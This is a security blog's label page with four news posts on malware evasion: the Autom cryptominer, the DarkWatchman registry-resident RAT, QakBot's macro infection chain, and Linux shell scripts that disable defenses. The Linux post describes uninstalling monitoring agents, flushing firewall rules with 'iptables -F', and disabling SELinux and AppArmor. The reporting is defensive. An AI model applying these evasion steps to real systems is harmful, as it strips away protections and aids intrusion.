Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Evasive Techniques. Show all posts

Autom Cryptomining Malware Employs Upgraded Evasion Techniques

 

The malicious Autom crypto mining campaign has upgraded its weapons while adding new defense evasion methods that allow attackers to fly under the radar of anti-virus scanning tools. 

According to researchers at DevSecOps and cloud security firm AquaSecurity, the malicious campaign was first identified in 2019, and since then a total of 84 attacks against researchers’ honeypot servers have been reported, four of these occurring in 2021.

Preliminary attacks of this campaign involved implementing a malicious command, once a user runs a vanilla image with the name "alpine:latest.” That action resulted in a shell script named "autom.sh." being downloaded on the device. 

"Adversaries commonly use vanilla images along with malicious commands to perform their attacks, because most organizations trust the official images and allow their use," the researchers explained in a blog post. "Over the years, the malicious command that was added to the official image to carry out the attack has barely changed. The main difference is the server from which the shell script autom.sh was downloaded."

The shell script initiates the attack sequence, allowing the attackers to create a new user account beneath the title "akay". Then, the account’s privileges are upgraded to a root user, enabling malicious actors to run arbitrary commands on the compromised machine and, eventually, abuse the available resources to mine crypto-currency. In the early stages of the 2019 campaign, there were no special methods to hide the mining activity, but the later versions depict the extreme measures its developers have taken to keep it hidden from scanning tools. 

The malicious campaigns carried out to hijack computers to mine cryptocurrencies have been dominated by several threat actors such as Kinsing, which has been spotted scanning the internet for misconfigured Docker servers to invade the unguarded hosts and install a previously undocumented coin miner strain. 

"Miners are a low-risk way for cybercriminals to turn a vulnerability into digital cash, with the greatest risk to their cash flow being competing miners discovering the same vulnerable servers," Sophos senior threat researcher Sean Gallagher explained in an analysis of a Tor2Mine mining campaign, which involves the use of a PowerShell script to disable malware protection, execute a miner payload, and harvest Windows credentials.

Novel Fileless Malware Uses Windows Registry as Storage to Bypass Detection

 

Cybersecurity researchers from Prevailion Adversarial Counterintelligence Team (PACT), have unearthed a new fileless malware dubbed DarkWatchman propagated via a social engineering campaign. 

The RAT is designed to completely bypass detection and analysis; thereby could easily be employed in ransomware operations. DarkWatchman uses a complex domain generation algorithm (DGA) to identify its command-and-control (C2) infrastructure and exploit the Windows Registry storage operations.

The malware "utilizes novel methods for fileless persistence, on-system activity, and dynamic run-time capabilities like self-updating and recompilation," researchers Matt Stafford and Sherman Smith stated. 

“It represents an evolution in fileless malware techniques, as it uses the registry for nearly all temporary and permanent storage and therefore never writes anything to disk, allowing it to operate beneath or around the detection threshold of most security tools." 

According to the researchers, the RAT began its operations in November and exploited multiple known TLS certificates. Given its backdoor and persistence features, the researchers believe that DarkWatchman could be an 'initial access and reconnaissance tool' used by ransomware groups. 

Typically, ransomware operators need other attackers for managing the persistence and wide distribution of their programs. The use of fileless malware with such detection evading techniques helps the developers of the ransomware with better oversight over the operation beyond negotiating ransoms.

The novel RAT is both a fileless JavaScript RAT and a C#-based keylogger, the latter of which is stored in the registry to avoid detection. Both the components are also extremely lightweight. The malicious JavaScript code just takes about 32kb, while the keylogger barely registers at 8.5kb. 

"The storage of the binary in the registry as encoded text means that DarkWatchman is persistent yet its executable is never (permanently) written to disk; it also means that DarkWatchman's operators can update (or replace) the malware every time it's executed," the researchers said. 

Once installed, the malware can execute arbitrary binaries, load DLL files, run JavaScript code, and PowerShell commands, upload files to a remote server, update itself, and even uninstall the RAT and keylogger from the exploited device. The JavaScript routine is also responsible for establishing persistence by creating a scheduled task that runs the malware at every user log on. 

"It would appear that the authors of DarkWatchman identified and took advantage of the complexity and opacity of the Windows Registry to work underneath or around the detection threshold of security tools and analysts alike," the researchers concluded. "Registry changes are commonplace, and it can be difficult to identify which changes are anomalous or outside the scope of normal OS and software functions."

QakBot (QBot) Campaign: A thorough Analysis



Trojan-Banker QakBot, also known by the names - QBot, QuackBot, and Pinkslipbot, is a modular information stealer that has been active for almost 14 years. With the key agenda of stealing banking credentials, QakBot employs various tools to evade detection and hamper manual analysis. The authors have developed the trojan with an aggressive sophistication that allows its variants to essentially deploy additional malware, create a backdoor to infected systems, and log user keystrokes. 

Typically, QakBot attacks contain MS Office Word documents that are deployed via phishing emails constructed to trick the user into accessing it. However, in 2020, some of the QakBot campaigns featured ZIP attachments that contained macros within the word document enclosed in the ZIP file. These macros are configured to trigger the execution of a PowerShell script that further downloads the QBot payload from selected internet addresses. 

Spoofing the Victim: Opening the QBot Infected Word Doc 

The word document which carries a malicious macro, once accessed by the victim, leads him to the Word Program on his system wherein he is asked to click on "Enable Content" shown in a yellow-colored dialogue box appearing right below the header. It reads "Security Warning" in bold letters. Once the user clicks onto it, it spoofs him into believing that it is taking its time to load data as another gray-colored dialogue box appears, reading "Loading data. Please wait..."

However, behind the scenes, the malicious Macro is being executed. As a part of the process, the Macro creates a folder in which it attempts to download the QakBot payload; it's placed in 5 different places. Referencing from the 5 corresponding URLs, it could be easily concluded that they all were constructed with the same website builder, which possibly has an exploit that lets EXE files being uploaded onto it with a PNG extension.

In one of its previous campaigns, upon running, QBot replaced the original binary with a duplicate 'Windows Calculator app: calc.exe'. Then, it scanned the installed programs, compared process names to a blacklist, examined registry entries, and inspected hardware details to eventually look for a virtualization software like VMware or VirtualBox. If QBot fails to detect a virtualization software, it copies the legitimate executable into a folder; it disguises itself as a signed valid certificate. After setting the executable in place, QBot schedules a task to run the executable every 5 hours. Once the execution is completed, an explorer.exe process is launched by QBot, the code of the same is injected into the process' memory. QBot can also execute additional processes employing double process mechanisms. 

In order to safeguard against the ever-evolving threat of QakBot, experts recommend organizations provide training to their employees who could come up with alternative solutions when automated intrusion-detectors fail.

Malicious Linux Shell Scripts Used to Evade Defenses

 

Attackers' evasive methods stretch back to the times when base64 and other popular encoding schemes were utilized. 

New Linux shell script methods and techniques are being used by attackers today to deactivate firewalls, monitor agents, and change access control lists (ACLs). The common evasive shell-script techniques are: 

1.Uninstalling monitoring agents 
Monitoring agents are software elements that track the system's process and network activity on a regular basis. The monitoring agents also produce various logs, which are useful during an incident probe. 

The malicious script, discovered in the osquery-based sandbox, attempts to uninstall the cloud-related monitoring agent Aegis (Alibaba Cloud threat detection agent) and terminate the Aliyun service. It also tries to uninstall YunJing, a host security agent from Tencent and BCM client management agent, which is generally installed on Endpoints for risk mitigation. 

2.Disabling Firewalls and Interrupts 
As a defensive measure, most systems and servers employ firewalls. As a defence evasive technique, the malicious software attempts to deactivate the firewall, i.e., uninterrupted firewall (ufw). In addition, attackers delete iptables rules (iptables -F), which are commonly used on Linux computers and servers for controlling firewall rules. 

The instructions were also exploited by attackers to deactivate non-maskable Interrupts (nmi). Watchdog is a configurable timer system that creates an interruption when a certain condition and time are met. The nmi watchdog interrupt handler would stop the process that caused the system to freeze in the case of a system freeze. To get over this defense, attackers disable the watchdog feature using the sysctl command or temporarily disabling it by setting the value to ‘0’. 

3.Disabling Linux Security Modules (LSMs) 
Security components such as SElinux and Apparmor are also disabled by the malicious shell script. These modules are used to establish MAC policies (mandatory access control). These modules might be easily configured by a server administrator to give users restricted access to the system's installed or running programs. 

-AppArmour: AppArmour is a Linux security feature that allows users to lock down apps such as Firefox for added protection. In Ubuntu's default setup, a user can restrict a program by granting it limited permissions. 

- SElinux: SElinux is a Linux security feature that allows a security administrator to deploy security context to certain apps and services. The shell is blocked or limited on various web servers, therefore RCE (Remote Code Execution) attackers generally bypass/disable it. 

4.Modifying ACLs 
The guidelines for granting rights on files and utilities are contained in ACLs, or Access Control Lists. ACLs on filesystems notify operating systems which users are authorized to access the system and what rights they possess. In Linux, the setfacl program is used to change and remove ACLs. 

5.Changing Attributes 
In Linux, the chattr is used to set and unset various characteristics of a file. Attackers use this to protect their own dropped files or to make their files permanent so that they can't be deleted by a user.

6.Renaming common utilities 
Common utilities like wget and curl were utilized with various names in one of the malicious scripts. These programs are often used to acquire files from a distant IP address. These tools are used by attackers to download malicious files from C2. 

If wget and curl are used under different names, some security systems that track the precise names of the utilities may not trigger the download event. 

-EDR Detections by Uptycs 
These malicious scripts were discovered with a threat level of 10/10 by Uptycs EDR using YARA process scanning. 

As attackers employ more complex and new techniques of evasion, it's more vital than ever to keep track of and document what's going on in the system. As per the Threat Post, the following suggestions are recommended: 

-Monitor suspicious processes, events, and network traffic that result from the execution of any untrusted binary on a regular basis.
-Keep your systems and firmware up to date with the most recent fixes and releases.